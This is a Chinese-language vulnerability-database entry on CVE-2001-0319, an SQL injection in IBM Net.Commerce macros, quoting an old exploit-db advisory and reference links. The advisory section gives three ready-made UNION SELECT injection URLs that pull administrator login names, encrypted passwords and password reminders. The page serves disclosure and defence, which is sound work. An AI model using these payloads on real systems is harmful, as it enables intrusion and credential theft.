IBM Net.Commerce远程执行任意命令漏洞

IBM Net.Commerce远程执行任意命令漏洞

漏洞ID 1106198 漏洞类型 SQL注入
发布时间 2001-02-05 更新时间 2005-05-02
图片[1]-IBM Net.Commerce远程执行任意命令漏洞-安全小百科CVE编号 CVE-2001-0319
图片[2]-IBM Net.Commerce远程执行任意命令漏洞-安全小百科CNNVD-ID CNNVD-200105-058
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20618
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-058
|漏洞详情
Net.Commerce是IBM发行的Websphere的一部分。它提供了一些通用特性使电子商务变得更加容易,其性能和可靠性也有独到之处。它默认支持的宏特性未对用户输入进行适当的检查,远程攻击者可以利用SQLInjection技术以帐号DB2INST1的权限执行任意SHELL命令。IBM已经修正了随Net.Commerce3.2、WebSphereCommerceSuite4.1发布的有安全漏洞的宏,但是用户自定义宏可能存在同样的安全漏洞。WebSphereCommerceSuite5.1不受此问题影响,它不使用Net.Data宏。
|漏洞EXP
source: http://www.securityfocus.com/bid/2350/info

IBM's Net.Commerce ecommerce platform supports macros which, by default, do not properly validate requests in user-supplied input. A thoughtfully-formed request to a vulnerable script can cause the server to disclose sensitive system information, including results of arbitrary queries to the Net.Commerce database. This can allow an attacker to obtain an elevation of privileges to that of the DB2INST1 account, and potentially issue arbitrary shell commands as the DB2INST1 user.

IBM fixed the vulnerable macros they ship with the product in Net.Commerce Versions 3.2 and WebSphere Commerce Suite 4.1. Custom macros created by the user may be vulnerable to this type of attack. WebSphere Commerce Suite Version 5.1 is not vulnerable at all as it does not use Net.Data macros. 

To obtain the administrator accounts use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

To obtain the encrypted passwords use the following URL:

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

To obtain the password reminders use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

"orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.

It may also be possible to query other databases.
|参考资料

来源:BID
名称:2350
链接:http://www.securityfocus.com/bid/2350
来源:www-4.ibm.com
链接:http://www-4.ibm.com/software/webservers/commerce/netcomletter.html
来源:BUGTRAQ
名称:20010205IBMNetCommerceSecurity
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0072.html
来源:XF
名称:ibm-netcommerce-reveal-information(6067)
链接:http://xforce.iss.net/xforce/xfdb/6067

相关推荐: IRIX cdplayer Vulnerability

IRIX cdplayer Vulnerability 漏洞ID 1105142 漏洞类型 Access Validation Error 发布时间 1996-11-21 更新时间 1996-11-21 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享